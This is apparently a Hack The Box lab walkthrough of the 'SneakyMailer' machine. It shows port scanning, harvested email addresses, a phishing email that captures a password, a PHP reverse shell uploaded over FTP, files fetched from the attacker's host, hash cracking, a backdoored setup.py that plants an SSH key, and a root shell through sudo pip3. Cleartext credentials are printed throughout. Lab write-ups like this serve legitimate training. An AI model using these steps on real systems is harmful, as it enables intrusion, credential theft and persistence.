Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-13 09:29 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:29
Completed NSE at 09:29, 0.00s elapsed
Initiating NSE at 09:29
Completed NSE at 09:29, 0.00s elapsed
Initiating NSE at 09:29
Completed NSE at 09:29, 0.00s elapsed
Initiating Ping Scan at 09:29
Scanning 10.10.10.197 [4 ports]
Completed Ping Scan at 09:29, 0.34s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:29
Scanning dev.sneakycorp.htb (10.10.10.197) [1000 ports]
Discovered open port 25/tcp on 10.10.10.197
Discovered open port 80/tcp on 10.10.10.197
Discovered open port 22/tcp on 10.10.10.197
Discovered open port 21/tcp on 10.10.10.197
Discovered open port 993/tcp on 10.10.10.197
Discovered open port 143/tcp on 10.10.10.197
Discovered open port 8080/tcp on 10.10.10.197
Completed SYN Stealth Scan at 09:29, 11.04s elapsed (1000 total ports)
Initiating Service scan at 09:29
Scanning 7 services on dev.sneakycorp.htb (10.10.10.197)
Completed Service scan at 09:29, 11.81s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against dev.sneakycorp.htb (10.10.10.197)
Retrying OS detection (try #2) against dev.sneakycorp.htb (10.10.10.197)
Retrying OS detection (try #3) against dev.sneakycorp.htb (10.10.10.197)
Retrying OS detection (try #4) against dev.sneakycorp.htb (10.10.10.197)
Retrying OS detection (try #5) against dev.sneakycorp.htb (10.10.10.197)
Initiating Traceroute at 09:30
Completed Traceroute at 09:30, 0.32s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 09:30
Completed Parallel DNS resolution of 2 hosts. at 09:30, 0.57s elapsed
NSE: Script scanning 10.10.10.197.
Initiating NSE at 09:30
Completed NSE at 09:30, 19.73s elapsed
Initiating NSE at 09:30
Completed NSE at 09:30, 31.01s elapsed
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
Nmap scan report for dev.sneakycorp.htb (10.10.10.197)
Host is up (0.66s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
| 256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_ 256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp open http nginx 1.14.2
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.14.2
|_http-title: Employee - Dashboard
143/tcp open imap Courier Imapd (released 2018)
|_imap-capabilities: completed CAPABILITY IDLE NAMESPACE ACL THREAD=REFERENCES QUOTA CHILDREN UTF8=ACCEPTA0001 IMAP4rev1 ENABLE OK ACL2=UNION STARTTLS THREAD=ORDEREDSUBJECT SORT UIDPLUS
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-14T17:14:21
| Not valid after: 2021-05-14T17:14:21
| MD5: 3faf 4166 f274 83c5 8161 03ed f9c2 0308
|_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Courier Imapd (released 2018)
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-14T17:14:21
| Not valid after: 2021-05-14T17:14:21
| MD5: 3faf 4166 f274 83c5 8161 03ed f9c2 0308
|_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
|_ssl-date: TLS randomness does not represent time
8080/tcp open http nginx 1.14.2
| http-methods:
|_ Supported Methods: GET HEAD
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/13%OT=21%CT=1%CU=36468%PV=Y%DS=2%DC=T%G=Y%TM=5F0BDC7
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Uptime guess: 7.778 days (since Sun Jul 5 14:50:01 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 322.24 ms 10.10.14.1
2 322.25 ms dev.sneakycorp.htb (10.10.10.197)
NSE: Script Post-scanning.
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
Initiating NSE at 09:30
Completed NSE at 09:30, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.42 seconds
Raw packets sent: 1619 (75.262KB) | Rcvd: 1163 (50.101KB)
ENUMERATION
Here We have Emails So we will make wordlist using CEWL and store it in a txt file.
EMAILS WORDLISTS :
airisatou@sneakymailer.htb
angelicaramos@sneakymailer.htb
ashtoncox@sneakymailer.htb
bradleygreer@sneakymailer.htb
brendenwagner@sneakymailer.htb
briellewilliamson@sneakymailer.htb
brunonash@sneakymailer.htb
caesarvance@sneakymailer.htb
carastevens@sneakymailer.htb
cedrickelly@sneakymailer.htb
chardemarshall@sneakymailer.htb
colleenhurst@sneakymailer.htb
dairios@sneakymailer.htb
donnasnider@sneakymailer.htb
doriswilder@sneakymailer.htb
finncamacho@sneakymailer.htb
fionagreen@sneakymailer.htb
garrettwinters@sneakymailer.htb
gavincortez@sneakymailer.htb
gavinjoyce@sneakymailer.htb
glorialittle@sneakymailer.htb
haleykennedy@sneakymailer.htb
hermionebutler@sneakymailer.htb
herrodchandler@sneakymailer.htb
hopefuentes@sneakymailer.htb
howardhatfield@sneakymailer.htb
jacksonbradshaw@sneakymailer.htb
jenagaines@sneakymailer.htb
jenettecaldwell@sneakymailer.htb
jenniferacosta@sneakymailer.htb
jenniferchang@sneakymailer.htb
jonasalexander@sneakymailer.htb
laelgreer@sneakymailer.htb
martenamccray@sneakymailer.htb
michaelsilva@sneakymailer.htb
michellehouse@sneakymailer.htb
olivialiang@sneakymailer.htb
paulbyrd@sneakymailer.htb
prescottbartlett@sneakymailer.htb
quinnflynn@sneakymailer.htb
rhonadavidson@sneakymailer.htb
sakurayamamoto@sneakymailer.htb
sergebaldwin@sneakymailer.htb
shaddecker@sneakymailer.htb
shouitou@sneakymailer.htb
sonyafrost@sneakymailer.htb
sukiburks@sneakymailer.htb
sulcud@sneakymailer.htb
tatyanafitzpatrick@sneakymailer.htb
thorwalton@sneakymailer.htb
tigernixon@sneakymailer.htb
timothymooney@sneakymailer.htb
unitybutler@sneakymailer.htb
vivianharrell@sneakymailer.htb
yuriberry@sneakymailer.htb
zenaidafrank@sneakymailer.htb
zoritaserrano@sneakymailer.htb
For refrence you can use IPPSEC’S CHAOS VIDEO Here we need valid EMAILS for this So we will be sending mails from unknown emails to these one by one Which after a while we will get valid email like this with password!
SENDING MAIL :
┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
└──╼ #telnet 10.10.10.197 25
Trying 10.10.10.197...
Connected to 10.10.10.197.
Escape character is '^]'.
MAIL FROM: liquid@sna220 debian ESMTP Postfix (Debian/GNU)
501 5.1.7 Bad sender address syntax
MAIL FROM: liquid@sneakymailer.htb
250 2.1.0 Ok
MAIL TO: paulbyrd@sneakymailer.htb
503 5.5.1 Error: nested MAIL command
RCPT TO: paulbyrd@sneakymailer.htb
250 2.1.5 Ok
DATA
h354 End data with <CR><LF>.<CR><LF>
http://10.10.15.56/
.
250 2.0.0 Ok: queued as 23A9424686
RESPONSE BACK ON PORT 80 :
┌─[✗]─[root@liquid]─[~/Desktop/HTB/sneakymailer]
└──╼ #nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.15.56] from (UNKNOWN) [10.10.10.197] 53704
POST /%0D HTTP/1.1
Host: 10.10.15.56
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded
firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt^C
paulbyrd@sneakymailer.htb : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
Now we will be using evolution to get all mails from this email :
So here we have another password for developer username :
developer : m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
For evolution part you can check ippsec’s chaos video
FTP LOGINS :
┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
└──╼ #ftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:root): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x 8 0 1001 4096 Jun 30 01:15 dev
226 Directory send OK.
ftp> cd dev
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 May 26 19:52 css
drwxr-xr-x 2 0 0 4096 May 26 19:52 img
-rwxr-xr-x 1 0 0 13742 Jun 23 09:44 index.php
drwxr-xr-x 3 0 0 4096 May 26 19:52 js
drwxr-xr-x 2 0 0 4096 May 26 19:52 pypi
drwxr-xr-x 4 0 0 4096 May 26 19:52 scss
-rwxr-xr-x 1 0 0 26523 May 26 20:58 team.php
drwxr-xr-x 8 0 0 4096 May 26 19:52 vendor
226 Directory send OK.
ftp>
SUBDOMAIN ENUMERATION :
┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
└──╼ #wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.sneakycorp.htb" --hc 301 --hw 356 -t 100 10.10.10.197
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.197/
Total requests: 207643
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000007: 400 7 L 12 W 173 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000009: 400 7 L 12 W 173 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000810: 200 340 L 989 W 13737 Ch "dev"
Here we have another webpage with subdomain and having same pages on website which we can access through FTP. So here we will just upload shell in FTP and will trigger it from website dev.sneakycorp.htb
UPLOAD SHELL IN DEV DIRECTORY :
ftp> put register.php
local: register.php remote: register.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5492 bytes sent in 0.01 secs (441.7859 kB/s)
ftp>
TRIGGER SHELL FROM WEBSITE :
RESPONSE WHICH YOU WILL GET :
┌─[root@liquid]─[~/Desktop/HTB/sneakymailer]
└──╼ #nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.15.56] from (UNKNOWN) [10.10.10.197] 48488
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
00:41:17 up 4 min, 0 users, load average: 0.17, 0.21, 0.10
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
GETTING USER ACCESS
$ bash -i
bash: cannot set terminal process group (685): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sneakymailer:/$ su developer
su developer
Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
bash: cannot set terminal process group (685): Inappropriate ioctl for device
bash: no job control in this shell
developer@sneakymailer:/$ cd
developer@sneakymailer:~$ id
uid=1001(developer) gid=1001(developer) groups=1001(developer)
developer@sneakymailer:~$ cd ../
developer@sneakymailer:/var/www$ ls
dev.sneakycorp.htb
html
pypi.sneakycorp.htb
sneakycorp.htb
developer@sneakymailer:/var/www$ cd pypi.sneakycorp.htb
cd pypi.sneakycorp.htb
developer@sneakymailer:/var/www/pypi.sneakycorp.htb$ ls -la
ls -la
total 20
drwxr-xr-x 4 root root 4096 May 15 14:29 .
drwxr-xr-x 6 root root 4096 May 14 18:25 ..
-rw-r--r-- 1 root root 43 May 15 14:29 .htpasswd
drwxrwx--- 2 root pypi-pkg 4096 Jun 30 02:24 packages
drwxr-xr-x 6 root pypi 4096 May 14 18:25 venv
developer@sneakymailer:/var/www/pypi.sneakycorp.htb$ cat .htpasswd
cat .htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Here we got another domain which we will be adding into /etc/hosts And a password which we will be cracking in our machine
So after cracking we got something like this:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/sneakymailer]
└──╼ #hashcat -m 1600 -a 0 pypihash ../../THM/Wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz, 2048/5898 MB allocatable, 8MCU
$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Hash.Target......: $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Time.Started.....: Mon Jul 13 10:17:57 2020 (3 mins, 10 secs)
Time.Estimated...: Mon Jul 13 10:21:07 2020 (0 secs)
Guess.Base.......: File (../../THM/Wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 19026 H/s (9.30ms) @ Accel:256 Loops:125 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 3614720/14344384 (25.20%)
Rejected.........: 0/3614720 (0.00%)
Restore.Point....: 3612672/14344384 (25.19%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidates.#1....: soulmeets1 -> sotoares
Started: Mon Jul 13 10:17:32 2020
Stopped: Mon Jul 13 10:21:08 2020
Also our pypi.sneakycorp.htb looks like this
So here we can conclude that we can install packages in machine. So what we will be doing is we will be installing them manually so that we could place our script in place of actual package.
REFRENCES :
https://pypi.org/project/pypiserver/#upload-with-setuptools
After channging minor parts in script it will look like
SETUP.PY :
import setuptools
try:
with open("/home/low/.ssh/authorized_keys", "a") as f:
f.write("\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChNgxk5jtpjV+hYI+KmW503AaJHeNk11nN14+YNuJ18yXmZn2sqME2DWirrHLpEyYvPeROs0tPBK+K3ZqL8SHierZZHY2FmLIlfAcDzN/mOjZzA3+cXX6iGgOo67nlhaiyisxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxJYw+svdLWT4ihbb/LWCeF+Kjam8bXgb8= root@liquid")
f.close()
except Exception as e:
pass
setuptools.setup(
name="example-pkg3", # Replace with your own username
version="0.0.1",
author="Example Author",
author_email="author@example.com",
description="A small example package",
long_description="",
long_description_content_type="text/markdown",
url="https://github.com/pypa/sampleproject",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
PYPIRC :
[distutils]
index-servers = local
[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui
Just upload both of them in TMP diretory in any folder and run this command :
python3 setup.py sdist register -r local upload -r local
developer@sneakymailer:/$ cd /tmp
cd /tmp
ldeveloper@sneakymailer:/tmp$ s
ls
systemd-private-2c8ab75d46924481ac84f56b75c9a067-systemd-timesyncd.service-a5Ynvb
vmware-root_458-834774610
developer@sneakymailer:/tmp$ mkdir liquid
mkdir liquid
cd developer@sneakymailer:/tmp$ liquid
cd liquid
developer@sneakymailer:/tmp/liquid$ HOME=$(pwd)
HOME=$(pwd)
developer@sneakymailer:~$ pwd
/tmp/liquid
pwd
developer@sneakymailer:~$ wget http://10.10.15.56/setup.py
wget http://10.10.15.56/setup.py
--2020-07-13 01:06:52-- http://10.10.15.56/setup.py
Connecting to 10.10.15.56:80... connected.
HTTP request sent, awaiting response... w200 OK
Length: 1193 (1.2K) [text/plain]
Saving to: ‘setup.py’
0K . 100% 1.94M=0.001s
2020-07-13 01:06:53 (1.94 MB/s) - ‘setup.py’ saved [1193/1193]
developer@sneakymailer:~$wget http://10.10.15.56/.pypirc
wget http://10.10.15.56/.pypirc
--2020-07-13 01:07:05-- http://10.10.15.56/.pypirc
Connecting to 10.10.15.56:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 128 [application/octet-stream]
Saving to: ‘.pypirc’
0K 100% 19.6M=0s
2020-07-13 01:07:07 (19.6 MB/s) - ‘.pypirc’ saved [128/128]
developer@sneakymailer:~$ python3 setup.py sdist register -r local upload -r local
<n3 setup.py sdist register -r local upload -r local
running sdist
running egg_info
creating example_pkg3.egg-info
writing example_pkg3.egg-info/PKG-INFO
writing dependency_links to example_pkg3.egg-info/dependency_links.txt
writing top-level names to example_pkg3.egg-info/top_level.txt
writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
reading manifest file 'example_pkg3.egg-info/SOURCES.txt'
writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
warning: sdist: standard file not found: should have one of README, README.rst, README.txt, README.md
running check
creating example-pkg3-0.0.1
creating example-pkg3-0.0.1/example_pkg3.egg-info
copying files to example-pkg3-0.0.1...
copying setup.py -> example-pkg3-0.0.1
copying example_pkg3.egg-info/PKG-INFO -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/SOURCES.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/dependency_links.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/top_level.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
Writing example-pkg3-0.0.1/setup.cfg
creating dist
Creating tar archive
removing 'example-pkg3-0.0.1' (and everything under it)
running register
Registering example-pkg3 to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Registering is deprecated, use twine to upload instead (https://pypi.org/p/twine/)
running upload
Submitting dist/example-pkg3-0.0.1.tar.gz to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Uploading via this command is deprecated, use twine to upload instead (https://pypi.org/p/twine/)
developer@sneakymailer:~$
~~~
<br>
Here we will just <kbd>SSH</kbd> into ther machine:
<br>
~~~ruby
┌─[root@liquid]─[~/Desktop/HTB/sneakymailer/pip]
└──╼ #ssh -i id_rsa low@10.10.10.197
Enter passphrase for key 'id_rsa':
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Tue Jun 9 03:02:52 2020 from 192.168.56.105
low@sneakymailer:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
low@sneakymailer:~$ cat user.txt
49438ae21c8095ddd5abe9b1608a266c
low@sneakymailer:~$
GETTING ROOT ACCESS
low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User low may run the following commands on sneakymailer:
(root) NOPASSWD: /usr/bin/pip3
low@sneakymailer:~$
low@sneakymailer:~$ TF=$(mktemp -d)
low@sneakymailer:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
low@sneakymailer:~$ sudo pip3 install $TF
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /tmp/tmp.qRgHUXIOL0
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# cat root.txt
d6b1290eeecc5a53d4fcf94fa26d00c0
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
